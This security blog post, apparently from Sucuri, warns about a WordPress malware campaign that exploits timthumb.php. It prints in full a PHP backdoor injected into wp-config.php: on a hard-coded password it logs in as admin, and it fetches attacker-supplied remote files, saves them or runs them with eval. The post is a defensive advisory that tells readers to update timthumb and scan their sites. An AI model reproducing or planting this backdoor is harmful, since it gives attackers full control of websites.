Just a quick update to the Superpuperdomain2.com/Superpuperdomain.com malware infection that has been affecting thousands of WordPress sites with the vulnerable timthumb.php script.
You can read more about it here: http://blog.sucuri.net/2011/08/wordpress-sites-hacked-with-superpuperdomain2-com.html
But now the attackers are also adding the following code to the wp-config.php of the hacked sites:
if (isset($_GET[‘pingnow’])&& isset($_GET[‘pass’])){
if ($_GET[‘pass’] == ’66f041e16a60928b05a7e228a89c3799′){
if ($_GET[‘pingnow’]== ‘login’){
$user_login = ‘admin’;
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action(‘wp_login’, $user_login);
}
if (($_GET[‘pingnow’]== ‘exec’)&&(isset($_GET[‘file’]))){
$ch = curl_init($_GET[‘file’]);
$fnm = md5(rand(0,100)).’.php’;
$fp = fopen($fnm, “w”);
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo “<SCRIPT LANGUAGE=\"JavaScript\”>location.href=’$fnm’;</SCRIPT>”;
}
if (($_GET[‘pingnow’]== ‘eval’)&&(isset($_GET[‘file’]))){
$ch = curl_init($_GET[‘file’]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}
It acts as a backdoor, so they can control the site and add more injections/malware whenever they want. If you are running WordPress, check if your theme (or plugin) have this timthumb.php script. If it has, update or remove it now! You can also scan it here to see if it is infected: http://sitecheck.sucuri.net.
Thanks,
Leave a reply
